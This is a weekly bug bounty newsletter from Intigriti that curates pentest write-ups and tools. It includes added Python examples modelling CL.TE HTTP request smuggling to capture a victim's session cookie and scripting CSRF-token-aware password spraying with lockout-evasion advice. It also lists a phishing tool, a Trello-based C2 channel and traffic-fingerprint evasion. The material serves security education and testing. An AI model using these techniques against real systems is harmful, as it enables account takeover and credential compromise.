Bug Bytes #52 – Account takeover via HTTP Request Smuggling, Lesser-known Tools for Android Application PenTesting and Hunting Credentials and Secrets in iOS Apps

By Intigriti

January 7, 2020

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.

This issue covers the week from 27 December to 3 January.

Our favorite 5 hacking items

1. Video of the week

Finding Your First Bug: Goal Setting / Remote Code Execution (RCE)

The title is deliberately misleading. The video is not really about finding RCEs, but about how to use goal setting and motivation to learn and eventually land your first RCE.
It comes at the perfect time, when many hackers (especially bug hunters) are sharing their goals for the new year.
But there is a huge difference between a goal expressed as a wish and measurable, realistic goals backed by an actionable plan.
So this is an absolute must-watch if you want to learn about goal setting (using the S.M.A.R.T. method) applied to bug bounty, how to create an action plan (using the GROW method), the non-technical skills you need to develop as a hacker, and much more.
If I could like this a hundred times, I would! Thanks @InsiderPhD ♡

2. Writeup of the week

Account takeover via HTTP Request Smuggling

This is an excellent walkthrough of an HTTP Request Smuggling attack. It goes beyond detection and shows how to confirm the vulnerability and then exploit it for account takeover.
That matters because detection alone, for example with Burp's HTTP Request Smuggler extension, is not enough: it is prone to false positives, so a candidate finding has to be confirmed before it is reported or exploited.
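To make the desynchronisation concrete, here is an added example (not code from the write-up or from Intigriti) that models the CL.TE variant: the same raw bytes are parsed once by Content-Length, as a front-end would, and once by Transfer-Encoding: chunked, as a back-end would. Whatever the back-end leaves unread stays in the connection buffer and becomes the prefix of the next request on that connection. The host name, paths and the victim request are constructed for the example, and the Foo header trick (no terminating CRLF, so the victim's request line is swallowed into a header value) is the classic textbook shape, not necessarily what the write-up's target looked like.

```python
# Added example, not from the write-up: a minimal model of CL.TE request smuggling.
# Two parsers read the same bytes, one honouring Content-Length (front-end) and one
# honouring Transfer-Encoding: chunked (back-end). The difference between what the
# front-end forwarded and what the back-end consumed is the smuggled prefix.
from typing import Dict, Tuple

CRLF = b"\r\n"


def split_head(raw: bytes) -> Tuple[Dict[bytes, bytes], bytes]:
    """Split an HTTP/1.1 message into {lower-cased header name: value} and the bytes after the blank line."""
    head, _, rest = raw.partition(CRLF + CRLF)
    headers: Dict[bytes, bytes] = {}
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, rest


def parse_content_length(raw: bytes) -> Tuple[bytes, bytes]:
    """Front-end view: body length comes from Content-Length alone. Returns (body, unread bytes)."""
    headers, rest = split_head(raw)
    n = int(headers.get(b"content-length", b"0").decode())
    return rest[:n], rest[n:]


def parse_chunked(raw: bytes) -> Tuple[bytes, bytes]:
    """Back-end view: body is chunked and ends at the zero-length chunk. Returns (body, unread bytes)."""
    headers, rest = split_head(raw)
    if headers.get(b"transfer-encoding", b"").lower() != b"chunked":
        raise ValueError("message is not chunked")
    body, pos = b"", 0
    while True:
        line_end = rest.index(CRLF, pos)
        size = int(rest[pos:line_end].decode(), 16)
        pos = line_end + 2
        if size == 0:
            return body, rest[pos + 2:]  # skip the CRLF that closes the terminating chunk
        body += rest[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF


def cl_te_request(smuggled: bytes, host: bytes = b"victim.example") -> bytes:
    """Attack request: Content-Length covers the empty chunked body plus the smuggled bytes."""
    body = b"0" + CRLF + CRLF + smuggled
    return (b"POST / HTTP/1.1" + CRLF
            + b"Host: " + host + CRLF
            + b"Content-Length: " + str(len(body)).encode() + CRLF
            + b"Transfer-Encoding: chunked" + CRLF + CRLF
            + body)


def smuggled_prefix(raw: bytes) -> bytes:
    """Bytes the front-end forwarded as part of this request that the back-end left in its buffer."""
    _, fe_unread = parse_content_length(raw)
    _, be_unread = parse_chunked(raw)
    forwarded = raw[:len(raw) - len(fe_unread)]
    consumed_by_backend = len(raw) - len(be_unread)
    return forwarded[consumed_by_backend:]


def backend_view_of_next(prefix: bytes, next_request: bytes) -> Tuple[bytes, Dict[bytes, bytes]]:
    """Request line and headers the back-end parses when the next request arrives behind the prefix."""
    combined = prefix + next_request
    request_line = combined.split(CRLF, 1)[0]
    headers, _ = split_head(combined)
    return request_line, headers


# Constructed demonstration data. The smuggled prefix ends in an unterminated header,
# so the victim's request line becomes part of that header's value.
SMUGGLED = b"GET /account HTTP/1.1" + CRLF + b"Foo: x"
VICTIM_REQUEST = (b"GET /home HTTP/1.1" + CRLF + b"Host: victim.example" + CRLF
                  + b"Cookie: session=victim-session" + CRLF + CRLF)

if __name__ == "__main__":
    prefix = smuggled_prefix(cl_te_request(SMUGGLED))
    line, hdrs = backend_view_of_next(prefix, VICTIM_REQUEST)
    print(line.decode(), "|", hdrs[b"foo"].decode(), "|", hdrs[b"cookie"].decode())
```

The model only covers CL.TE; TE.CL swaps the two parsers' roles. It also says nothing about detection: a timing-based probe, which is what scanners lean on, can be tripped by ordinary slow back-ends, which is why the write-up's confirmation step (a differential response you control, rather than a delay) is the part worth copying.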

3. Tools of the week

Endpointdiff
Hakrawler & Introduction

These are two nice additions to a Web app tester’s arsenal.
Endpointdiff helps with monitoring JavaScript files. It uses LinkFinder to extract endpoints from JS files and compares the output with the results of the previous run, so new or removed endpoints stand out.
Hakrawler is described as a simple, fast web crawler designed for easy, quick discovery of endpoints and assets. It is similar to Photon but written in Go and made for crawling large lists of domains. It also has an option to export the results for chaining with other tools like Sqlmap.
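The two steps Endpointdiff chains together, as an added example that is neither Endpointdiff's nor LinkFinder's own code: pull endpoint-looking string literals out of a JavaScript file, then diff the set against a stored snapshot from the previous run. ENDPOINT_RE is a deliberately simplified stand-in for LinkFinder's much broader regex, and both JavaScript samples are constructed.

```python
# Added example, not Endpointdiff's or LinkFinder's code: endpoint extraction from
# JavaScript plus a diff against the previous run's snapshot.
import json
import re
from typing import Dict, Set, Tuple

# Quoted strings that look like absolute URLs, root-relative paths, or file names with a
# server-side extension. A simplification for the example, not LinkFinder's actual pattern.
ENDPOINT_RE = re.compile(
    r'''["'`](https?://[^"'`\s]+|/[A-Za-z0-9_./?=&%-]*|[A-Za-z0-9_./-]+\.(?:json|php|aspx?|jsp|do|action))["'`]'''
)


def extract_endpoints(js: str) -> Set[str]:
    """LinkFinder-style step: every distinct endpoint-looking literal in the file."""
    return {m.group(1) for m in ENDPOINT_RE.finditer(js)}


def diff_endpoints(previous: Set[str], current: Set[str]) -> Dict[str, Set[str]]:
    """Endpointdiff-style step: what appeared and what disappeared since the last run."""
    return {"added": current - previous, "removed": previous - current}


def monitor(js: str, previous_snapshot: str) -> Tuple[Dict[str, Set[str]], str]:
    """One monitoring cycle. previous_snapshot is the JSON list stored by the last run
    (empty string on the first run); the new snapshot is returned for the caller to store."""
    previous = set(json.loads(previous_snapshot)) if previous_snapshot else set()
    current = extract_endpoints(js)
    return diff_endpoints(previous, current), json.dumps(sorted(current))


# Constructed samples: the "new" file is the old one with two additions.
OLD_JS = '''
fetch("/api/v1/users").then(r => r.json());
const logo = '/static/logo.png';
$.get("https://api.example.test/v1/search?q=");
'''
NEW_JS = OLD_JS + '''
fetch("/api/v2/users/export", {method: "POST"});
const cfg = `settings.json`;
'''

if __name__ == "__main__":
    first_diff, snapshot = monitor(OLD_JS, "")
    second_diff, snapshot = monitor(NEW_JS, snapshot)
    print("first run:", sorted(first_diff["added"]))
    print("new since last run:", sorted(second_diff["added"]))
```

In a real deployment the snapshot would be written to disk (or a database) per target file, and the diff would be the thing that triggers a notification; a freshly added `/api/v2/...` path is exactly the kind of signal that is worth testing before everyone else does.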

4. Resource of the week

Lesser-known Tools for Android Application PenTesting

Amazing article by @CaptMeelo for anyone interested in testing the security of Android apps.
It’s about some tools he finds helpful for assessments. They are useful for:

  • Bypassing protections against screenshots

  • Bypassing root detection

  • Using ADB over Wi-Fi

  • A better method for retrieving logs (simplified and colorful output)

  • Removing the terminal size limitation when using ADB shell

5. Tutorials of the week

Low-Hanging Apples: Hunting Credentials and Secrets in iOS Apps
Password Spraying Dell SonicWALL Virtual Office

The first link is a cool tutorial by @spaceraccoonsec on finding credentials and secrets in iOS apps. The methods covered include both static and dynamic analysis.
These are the basics that can help you snag easy bounties or support a traditional penetration test. Very helpful indeed!
The second tutorial, by @n00py1, walks through a situation where Burp Macros were necessary. The login form he was testing used a CSRF token, so it could not be attacked with Intruder without first setting up a macro and a session handling rule that fetches a fresh token before each request. The article shows exactly how to do that.
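The same macro plus session-handling-rule sequence, scripted outside Burp as an added example (not the tutorial's own code). A constructed mock stands in for the login portal: it hands out one CSRF token per session on GET and consumes it on POST, which is an assumption about the target, not a claim about how the SonicWALL form works. The point it makes is the one the tutorial turns on: a token captured once cannot be replayed across Intruder payloads, so every attempt after the first is rejected before the credentials are even checked. The user names and passwords are invented.

```python
# Added example, not from the tutorial: why a plain Intruder run fails against a
# CSRF-protected login, and what the macro + session handling rule does instead.
import re
import secrets
from typing import Dict, Iterable, Tuple


class MockLoginServer:
    """Constructed stand-in for the target portal. Credentials and token scheme are assumptions."""
    VALID = {"alice": "Winter2020!", "bob": "Summer2019!"}

    def __init__(self) -> None:
        self._sessions: Dict[str, str] = {}  # session id -> outstanding CSRF token

    def get_login(self) -> Tuple[str, str]:
        """GET /login: a new session cookie and a form carrying that session's CSRF token."""
        sid, token = secrets.token_hex(8), secrets.token_hex(16)
        self._sessions[sid] = token
        html = f'<form method="post"><input type="hidden" name="csrf_token" value="{token}"></form>'
        return sid, html

    def post_login(self, sid: str, token: str, user: str, password: str) -> str:
        """POST /login: the token must match the session, and is consumed whether or not it does."""
        expected = self._sessions.pop(sid, None)
        if expected is None or not secrets.compare_digest(expected, token):
            return "403 invalid csrf token"
        if self.VALID.get(user) == password:
            return "302 /dashboard"
        return "200 bad credentials"


TOKEN_RE = re.compile(r'name="csrf_token"\s+value="([0-9a-f]+)"')


def extract_token(html: str) -> str:
    """The macro's 'custom parameter location' step: pull the token out of the form."""
    m = TOKEN_RE.search(html)
    if not m:
        raise ValueError("csrf token not found in form")
    return m.group(1)


def spray_without_macro(server: MockLoginServer, users: Iterable[str], password: str) -> Dict[str, str]:
    """Plain Intruder run: one session and one token, reused for every payload."""
    sid, html = server.get_login()
    token = extract_token(html)
    return {u: server.post_login(sid, token, u, password) for u in users}


def spray_with_macro(server: MockLoginServer, users: Iterable[str], password: str) -> Dict[str, str]:
    """Macro + session handling rule: refetch the form and token before each request."""
    results: Dict[str, str] = {}
    for u in users:
        sid, html = server.get_login()
        results[u] = server.post_login(sid, extract_token(html), u, password)
    return results


USERS = ["alice", "bob", "carol"]

if __name__ == "__main__":
    print("without macro:", spray_without_macro(MockLoginServer(), USERS, "Winter2020!"))
    print("with macro:   ", spray_with_macro(MockLoginServer(), USERS, "Winter2020!"))
```

Without the macro only the first user is actually tested; everyone after that gets a 403 that has nothing to do with their password, which is easy to misread as "no valid credentials" in Intruder's results table. Keep the usual spraying discipline regardless of tooling: one password per round across the whole user list, and a delay between rounds that stays under the target's lockout threshold.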

Other amazing things we stumbled upon this week

Videos

Podcasts

Webinars & Webcasts

Conferences

Tutorials

Medium to advanced

Beginners corner

Writeups

Challenge writeups

Pentest writeups

Responsible(ish) disclosure writeups

Bug bounty writeups

See more writeups on The list of bug bounty writeups.

Tools

If you don’t have time

  • Parsuite & Introduction: Simple parser framework

  • Random_user-agent.py: Script to make every request through Burp have a random User-Agent. Combined with the Python Scripter Burp Extension & proxycannon-ng, your traffic will be tougher to fingerprint

More tools, if you have time

  • Turbolist3r: A fork of the sublist3r subdomain discovery tool. In addition to the original OSINT capabilities of sublist3r, turbolist3r automates some analysis of the results, with a focus on subdomain takeover.

  • Bountystrike-sh

  • Dirlstr: Finds Directory Listings or open S3 buckets from a list of URLs

  • Kostebek: A reconnaissance tool which uses firms’ trademark information to discover their domains

  • IotShark: Monitoring and Analyzing IoT Traffic

  • PENIOT: Penetration Testing Tool for IoT

  • PHP Version Audit: Audit your PHP version for known CVEs and patches

  • HiddenEye: Modern Phishing Tool With Advanced Functionality And Multiple Tunnelling Services

  • TrelloC2: Simple C2 over the Trello API

Misc. pentest & bug bounty resources

Challenges

Articles

News

Bug bounty & Pentest news

Vulnerabilities

Breaches & Attacks

Malicious apps/sites

Other news

Non technical

Tweeted this week

We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 12/27/2019 to 01/03/2020.

The views and opinions expressed in this article are those of the curators and do not necessarily reflect the position of intigriti.

Curated by Pentester Land & Sponsored by Intigriti
